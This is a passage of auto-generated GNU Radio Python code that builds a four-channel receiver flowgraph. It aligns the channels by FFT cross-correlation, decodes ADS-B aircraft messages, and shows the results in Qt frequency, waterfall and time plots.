self.qtgui_freq_sink_x_0_1.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_1.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0_1.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_1.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_1.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_1.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_1_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_1_win, 0, 2, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0_0.enable_grid(False)
self.qtgui_freq_sink_x_0_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_0_win, 0, 1, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0.enable_grid(False)
self.qtgui_freq_sink_x_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_win, 0, 0, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_0_0_win = self.pyqt_meta_text_output_0_0_0_0_0;
self.main_tab_grid_layout_4.addWidget(self._pyqt_meta_text_output_0_0_0_0_0_win, 4, 4, 4, 2)
for r in range(4, 8):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(4, 6):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_0_win = self.pyqt_meta_text_output_0_0_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_0_win, 1, 3, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_win = self.pyqt_meta_text_output_0_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_win, 1, 2, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_win = self.pyqt_meta_text_output_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_win, 1, 1, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_win = self.pyqt_meta_text_output_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_win, 1, 0, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.fft_vxx_1_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_1_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_1 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_1_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_1 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.blocks_throttle_3 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_throttle_2 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_throttle_1 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate /throttle,True)
self.blocks_throttle_0 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle,True)
self.blocks_sub_xx_0_0_0 = blocks.sub_ff(1)
self.blocks_sub_xx_0_0 = blocks.sub_ff(1)
self.blocks_sub_xx_0 = blocks.sub_ff(1)
self.blocks_stream_to_vector_0_1_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_1 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_stream_to_vector_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
self.blocks_skiphead_3 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_2 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_1 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_skiphead_0 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
self.blocks_short_to_float_0_0_0 = blocks.short_to_float(1, 1)
self.blocks_short_to_float_0_0 = blocks.short_to_float(1, 1)
self.blocks_short_to_float_0 = blocks.short_to_float(1, 1)
self.blocks_null_sink_0_0_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_null_sink_0_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_null_sink_0 = blocks.null_sink(gr.sizeof_short*1)
self.blocks_multiply_const_vxx_1_0_1_0_0_1 = blocks.multiply_const_vff((180.0/math.pi, ))
self.blocks_multiply_const_vxx_1_0_1_0_0_0 = blocks.multiply_const_vff((180.0/math.pi, ))
self.blocks_multiply_const_vxx_1_0_1_0_0 = blocks.multiply_const_vff((180.0/math.pi, ))
self.blocks_multiply_const_vxx_1_0_1_0 = blocks.multiply_const_vff((180.0/math.pi, ))
self.blocks_multiply_const_vxx_0_0_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_const_vxx_0_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vff((-1, ))
self.blocks_multiply_conjugate_cc_0_0_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_multiply_conjugate_cc_0_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_multiply_conjugate_cc_0 = blocks.multiply_conjugate_cc(nfft)
self.blocks_max_xx_0_0_0 = blocks.max_ff(nfft,1)
self.blocks_max_xx_0_0 = blocks.max_ff(nfft,1)
self.blocks_max_xx_0 = blocks.max_ff(nfft,1)
self.blocks_delay_3_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_3 + int(function_probe_0_3)+manual_fine_delay_3)
self.blocks_delay_3 = blocks.delay(gr.sizeof_gr_complex*1, delay_3)
self.blocks_delay_2_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_2 + int(function_probe_0_2) + manual_fine_delay_2)
self.blocks_delay_2 = blocks.delay(gr.sizeof_gr_complex*1, delay_2)
self.blocks_delay_1_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_1 + int(function_probe_0_1) + manual_fine_delay_1)
self.blocks_delay_1 = blocks.delay(gr.sizeof_gr_complex*1, delay_1)
self.blocks_delay_0_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_0 + manual_fine_delay_0)
self.blocks_delay_0 = blocks.delay(gr.sizeof_gr_complex*1, delay_0)
self.blocks_complex_to_mag_squared_1_0_0_0_0_2 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_2_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_2 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_1_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_1 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_squared_0 = blocks.complex_to_mag_squared(1)
self.blocks_complex_to_mag_0_0_0 = blocks.complex_to_mag(nfft)
self.blocks_complex_to_mag_0_0 = blocks.complex_to_mag(nfft)
self.blocks_complex_to_mag_0 = blocks.complex_to_mag(nfft)
self.blocks_complex_to_arg_0_0_1 = blocks.complex_to_arg(1)
self.blocks_complex_to_arg_0_0_0 = blocks.complex_to_arg(1)
self.blocks_complex_to_arg_0_0 = blocks.complex_to_arg(1)
self.blocks_complex_to_arg_0 = blocks.complex_to_arg(1)
self.blocks_argmax_xx_0_0_0 = blocks.argmax_fs(nfft)
self.blocks_argmax_xx_0_0 = blocks.argmax_fs(nfft)
self.blocks_argmax_xx_0 = blocks.argmax_fs(nfft)
self.blocks_add_xx_0 = blocks.add_vcc(1)
self.blocks_add_const_vxx_0_0_0 = blocks.add_const_vff((-nfft / 2, ))
self.blocks_add_const_vxx_0_0 = blocks.add_const_vff((-nfft / 2, ))
self.blocks_add_const_vxx_0 = blocks.add_const_vff((-nfft / 2, ))
self.analog_const_source_x_0_0_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_const_source_x_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, thresh)
self.analog_agc2_xx_0_3 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_3.set_max_gain(65536)
self.analog_agc2_xx_0_2 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_2.set_max_gain(65536)
self.analog_agc2_xx_0_1 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0_1.set_max_gain(65536)
self.analog_agc2_xx_0 = analog.agc2_cc(1e-1, 1e-2, 1.0, 1.0)
self.analog_agc2_xx_0.set_max_gain(65536)
self.adsb_framer_1_0_0_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1_0 = adsb.framer(samp_rate, thresh)
self.adsb_framer_1 = adsb.framer(samp_rate, thresh)
self.adsb_demod_0_0_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0_0 = adsb.demod(samp_rate)
self.adsb_demod_0 = adsb.demod(samp_rate)
self.adsb_decoder_0_0_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
self.adsb_decoder_0 = adsb.decoder("Extended Squitter Only", "None", "Verbose")
##################################################
# Connections
##################################################
self.msg_connect((self.adsb_decoder_0, 'decoded'), (self.pyqt_meta_text_output_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0_0, 'pdus'))
self.msg_connect((self.adsb_decoder_0_0_0_0_0, 'decoded'), (self.pyqt_meta_text_output_0_0_0_0_0, 'pdus'))
self.msg_connect((self.adsb_demod_0, 'demodulated'), (self.adsb_decoder_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0, 'demodulated'), (self.adsb_decoder_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0_0, 'demodulated'))
self.msg_connect((self.adsb_demod_0_0_0_0_0, 'demodulated'), (self.adsb_decoder_0_0_0_0_0, 'demodulated'))
self.connect((self.adsb_demod_0, 0), (self.qtgui_time_sink_x_0_1_0, 0))
self.connect((self.adsb_demod_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0, 0))
self.connect((self.adsb_demod_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0, 0))
self.connect((self.adsb_demod_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0, 0))
self.connect((self.adsb_demod_0_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0_0, 0))
self.connect((self.adsb_framer_1, 0), (self.adsb_demod_0, 0))
self.connect((self.adsb_framer_1_0, 0), (self.adsb_demod_0_0, 0))
self.connect((self.adsb_framer_1_0_0, 0), (self.adsb_demod_0_0_0, 0))
self.connect((self.adsb_framer_1_0_0_0, 0), (self.adsb_demod_0_0_0_0, 0))
self.connect((self.adsb_framer_1_0_0_0_0, 0), (self.adsb_demod_0_0_0_0_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.blocks_complex_to_mag_squared_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.blocks_delay_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.blocks_delay_0_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.qtgui_freq_sink_x_0, 0))
self.connect((self.analog_agc2_xx_0, 0), (self.qtgui_waterfall_sink_x_0, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_complex_to_mag_squared_0_1, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_delay_1, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.blocks_delay_1_0, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.qtgui_freq_sink_x_0_0, 0))
self.connect((self.analog_agc2_xx_0_1, 0), (self.qtgui_waterfall_sink_x_0_0, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_complex_to_mag_squared_0_1_0, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_delay_2, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.blocks_delay_2_0, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.qtgui_freq_sink_x_0_1, 0))
self.connect((self.analog_agc2_xx_0_2, 0), (self.qtgui_waterfall_sink_x_0_0_0, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_complex_to_mag_squared_0_1_1, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_delay_3, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.blocks_delay_3_0, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.qtgui_freq_sink_x_0_1_0, 0))
self.connect((self.analog_agc2_xx_0_3, 0), (self.qtgui_waterfall_sink_x_0_0_1, 0))
self.connect((self.analog_const_source_x_0, 0), (self.qtgui_time_sink_x_0_1_0, 1))
self.connect((self.analog_const_source_x_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_0_0_0_0_0, 1))
self.connect((self.blocks_add_const_vxx_0, 0), (self.blocks_multiply_const_vxx_0, 0))
self.connect((self.blocks_add_const_vxx_0_0, 0), (self.blocks_multiply_const_vxx_0_0, 0))
self.connect((self.blocks_add_const_vxx_0_0_0, 0), (self.blocks_multiply_const_vxx_0_0_0, 0))
self.connect((self.blocks_add_xx_0, 0), (self.blocks_complex_to_mag_squared_1_0_0_0_0, 0))
self.connect((self.blocks_add_xx_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 4))
self.connect((self.blocks_argmax_xx_0, 1), (self.blocks_null_sink_0, 0))
self.connect((self.blocks_argmax_xx_0, 0), (self.blocks_short_to_float_0, 0))
self.connect((self.blocks_argmax_xx_0_0, 1), (self.blocks_null_sink_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0, 0), (self.blocks_short_to_float_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0_0, 1), (self.blocks_null_sink_0_0_0, 0))
self.connect((self.blocks_argmax_xx_0_0_0, 0), (self.blocks_short_to_float_0_0_0, 0))
self.connect((self.blocks_complex_to_arg_0, 0), (self.blocks_multiply_const_vxx_1_0_1_0, 0))
self.connect((self.blocks_complex_to_arg_0_0, 0), (self.blocks_multiply_const_vxx_1_0_1_0_0, 0))
self.connect((self.blocks_complex_to_arg_0_0_0, 0), (self.blocks_multiply_const_vxx_1_0_1_0_0_0, 0))
self.connect((self.blocks_complex_to_arg_0_0_1, 0), (self.blocks_multiply_const_vxx_1_0_1_0_0_1, 0))
self.connect((self.blocks_complex_to_mag_0, 0), (self.single_pole_iir_filter_xx_0, 0))
self.connect((self.blocks_complex_to_mag_0_0, 0), (self.single_pole_iir_filter_xx_0_0, 0))
self.connect((self.blocks_complex_to_mag_0_0_0, 0), (self.single_pole_iir_filter_xx_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0, 0), (self.qtgui_time_sink_x_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_0, 0), (self.qtgui_time_sink_x_0_1, 0))
self.connect((self.blocks_complex_to_mag_squared_0_0_0, 0), (self.qtgui_time_sink_x_0_1_1, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1, 0), (self.qtgui_time_sink_x_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_0, 0), (self.qtgui_time_sink_x_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_0_0, 0), (self.qtgui_time_sink_x_0_1, 2))
self.connect((self.blocks_complex_to_mag_squared_0_1_0_0_0, 0), (self.qtgui_time_sink_x_0_1_1, 2))
self.connect((self.blocks_complex_to_mag_squared_0_1_1, 0), (self.qtgui_time_sink_x_0_0_1, 0))
self.connect((self.blocks_complex_to_mag_squared_0_1_1_0, 0), (self.qtgui_time_sink_x_0_1, 3))
self.connect((self.blocks_complex_to_mag_squared_0_1_1_0_0, 0), (self.qtgui_time_sink_x_0_1_1, 3))
self.connect((self.blocks_complex_to_mag_squared_0_1_2, 0), (self.qtgui_time_sink_x_0_1, 1))
self.connect((self.blocks_complex_to_mag_squared_0_1_2_0, 0), (self.qtgui_time_sink_x_0_1_1, 1))
self.connect((self.blocks_complex_to_mag_squared_1, 0), (self.adsb_framer_1, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0, 0), (self.adsb_framer_1_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0, 0), (self.adsb_framer_1_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0, 0), (self.adsb_framer_1_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0, 0), (self.adsb_framer_1_0_0_0_0, 0))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0, 0), (self.qtgui_time_sink_x_0_1_1, 4))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0_2, 0), (self.qtgui_time_sink_x_0_1_1_1, 4))
self.connect((self.blocks_complex_to_mag_squared_1_0_0_0_0_2, 0), (self.qtgui_time_sink_x_2, 3))
self.connect((self.blocks_delay_0, 0), (self.blocks_complex_to_mag_squared_0_0, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_complex_to_mag_squared_1, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0_1, 0))
self.connect((self.blocks_delay_0, 0), (self.blocks_stream_to_vector_0_1_0, 0))
self.connect((self.blocks_delay_0_0, 0), (self.blocks_add_xx_0, 0))
self.connect((self.blocks_delay_0_0, 0), (self.blocks_complex_to_arg_0, 0))
self.connect((self.blocks_delay_0_0, 0), (self.blocks_complex_to_mag_squared_0_0_0, 0))
self.connect((self.blocks_delay_0_0, 0), (self.blocks_complex_to_mag_squared_1_0_0_0_0_2, 0))
self.connect((self.blocks_delay_0_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_complex_to_mag_squared_0_1_2, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_complex_to_mag_squared_1_0, 0))
self.connect((self.blocks_delay_1, 0), (self.blocks_stream_to_vector_0_0, 0))
self.connect((self.blocks_delay_1_0, 0), (self.blocks_add_xx_0, 1))
self.connect((self.blocks_delay_1_0, 0), (self.blocks_complex_to_arg_0_0, 0))
self.connect((self.blocks_delay_1_0, 0), (self.blocks_complex_to_mag_squared_0_1_2_0, 0))
self.connect((self.blocks_delay_1_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 1))
self.connect((self.blocks_delay_2, 0), (self.blocks_complex_to_mag_squared_0_1_0_0, 0))
self.connect((self.blocks_delay_2, 0), (self.blocks_complex_to_mag_squared_1_0_0, 0))
self.connect((self.blocks_delay_2, 0), (self.blocks_stream_to_vector_0_0_0, 0))
self.connect((self.blocks_delay_2_0, 0), (self.blocks_add_xx_0, 2))
self.connect((self.blocks_delay_2_0, 0), (self.blocks_complex_to_arg_0_0_0, 0))
self.connect((self.blocks_delay_2_0, 0), (self.blocks_complex_to_mag_squared_0_1_0_0_0, 0))
self.connect((self.blocks_delay_2_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 2))
self.connect((self.blocks_delay_3, 0), (self.blocks_complex_to_mag_squared_0_1_1_0, 0))
self.connect((self.blocks_delay_3, 0), (self.blocks_complex_to_mag_squared_1_0_0_0, 0))
self.connect((self.blocks_delay_3, 0), (self.blocks_stream_to_vector_0_0_0_0, 0))
self.connect((self.blocks_delay_3_0, 0), (self.blocks_add_xx_0, 3))
self.connect((self.blocks_delay_3_0, 0), (self.blocks_complex_to_arg_0_0_1, 0))
self.connect((self.blocks_delay_3_0, 0), (self.blocks_complex_to_mag_squared_0_1_1_0_0, 0))
self.connect((self.blocks_delay_3_0, 0), (self.qtgui_time_sink_x_0_1_1_0, 3))
self.connect((self.blocks_max_xx_0, 0), (self.qtgui_time_sink_x_1, 0))
self.connect((self.blocks_max_xx_0_0, 0), (self.qtgui_time_sink_x_1, 1))
self.connect((self.blocks_max_xx_0_0_0, 0), (self.qtgui_time_sink_x_1, 2))
self.connect((self.blocks_multiply_conjugate_cc_0, 0), (self.fft_vxx_0_0, 0))
self.connect((self.blocks_multiply_conjugate_cc_0_0, 0), (self.fft_vxx_0_0_0, 0))
self.connect((self.blocks_multiply_conjugate_cc_0_0_0, 0), (self.fft_vxx_0_0_0_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.probe_offset_0_1, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.qtgui_number_sink_0, 0))
self.connect((self.blocks_multiply_const_vxx_0_0, 0), (self.probe_offset_0_2, 0))
self.connect((self.blocks_multiply_const_vxx_0_0, 0), (self.qtgui_number_sink_0, 1))
self.connect((self.blocks_multiply_const_vxx_0_0_0, 0), (self.probe_offset_0_3, 0))
self.connect((self.blocks_multiply_const_vxx_0_0_0, 0), (self.qtgui_number_sink_0, 2))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0, 0), (self.blocks_sub_xx_0, 0))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0, 0), (self.blocks_sub_xx_0_0, 0))
